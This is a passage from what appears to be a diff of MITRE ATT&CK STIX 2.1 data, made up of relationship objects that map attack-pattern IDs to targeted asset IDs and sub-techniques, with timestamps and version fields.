"attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1bd607f-36ac-4a90-be04-b74b2297a9a7", + "created": "2024-05-21T16:23:41.117Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-21T16:23:41.117Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1bed024-4a44-4b03-bbfd-5f9e7324059f", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1c7b9e8-f798-4b49-ab8e-b34329076c94", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1d0bf5b-602b-4e90-9db1-a666413c7e50", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1d575fb-e70b-4476-be07-dd5bbef73d16", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1e82401-bc99-4d40-a80d-b0dcf5ad200d", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1eb74c1-b593-4982-a4a0-3e5730b6a9a3", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1ed9124-8887-44b5-9205-371e9858fa9f", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1edb034-6dc6-4d6c-8f75-e2cd12213704", + "created": "2023-09-29T17:07:38.219Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:07:38.219Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1f16e12-9f24-4281-a869-272a122fe6d2", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f21a5bbb-d5a8-4960-92e9-fdf732643cf1", + "created": "2024-06-26T19:27:18.211Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:27:18.211Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f223d48f-3536-4b7c-8b7f-fbbc598d2f02", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2427e7e-7048-4f19-a404-23cf7ce11d88", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f251d244-4f34-418a-9b9c-3a94914ef6d7", + "created": "2024-06-26T19:24:59.209Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:24:59.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f288f94a-3318-4d73-98f0-cfa0cbb98a7e", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f29cfe86-cee2-45fc-879e-e9262ec00de7", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2a37ee0-cfaa-46dd-ad53-146c50446985", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2af62eb-4ae7-4b45-9706-742568275ea7", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2c07222-8fbb-4018-ba68-f086d7e5712f", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2ce3446-c0ca-499c-bc7f-1930ce148285", + "created": "2020-10-02T16:34:32.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2d8189b-efc4-47ff-8b63-ec58e18abc7e", + "created": "2020-03-15T00:37:59.164Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f2f81034-9bcc-48a0-a9b9-cf1ce379980f", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f32e9ed6-3acb-4913-ac86-ceae35fad032", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f353e8ec-0766-4fbd-86b7-9ea06b52958b", + "created": "2023-09-28T21:23:51.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:23:51.038Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3656b6e-034a-4104-b6d2-e5fca6437b24", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f382ace4-199c-4a76-85a0-2be4451a2f56", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3a7c468-d3f4-42eb-9d1c-93a3daab91e8", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3a8856c-163f-4d30-9e5e-496e75ddc0b2", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3b284d0-a3de-4ad7-9ce6-c25dd0b99cb6", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3d4ae27-fd52-4c1d-9835-293b6c18ad27", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3dd024f-40b6-4dae-bbc0-8e7ce0fbf774", + "created": "2024-05-23T04:11:29.313Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:38:33.205Z", + "description": "Asset Mapping Rationale: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3e30322-631a-4bf9-91c5-ecf36a6623b3", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3f3a6bd-ffd8-483d-9dd7-392ddffbd3fb", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f3f3f000-1e9a-4f39-b146-fc1675677ae3", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f400c10f-92d3-4f9e-a06b-eff5fa074272", + "created": "2024-06-26T15:01:40.236Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:01:40.236Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f43f86a9-2fd1-432c-83ca-3ecefaddf1cf", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4415c4c-bbf3-486a-97c3-93602705475d", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f44f15a3-3618-4d5d-8865-dded75181804", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4761f7a-56af-4974-bbe3-94e5c2cf2b53", + "created": 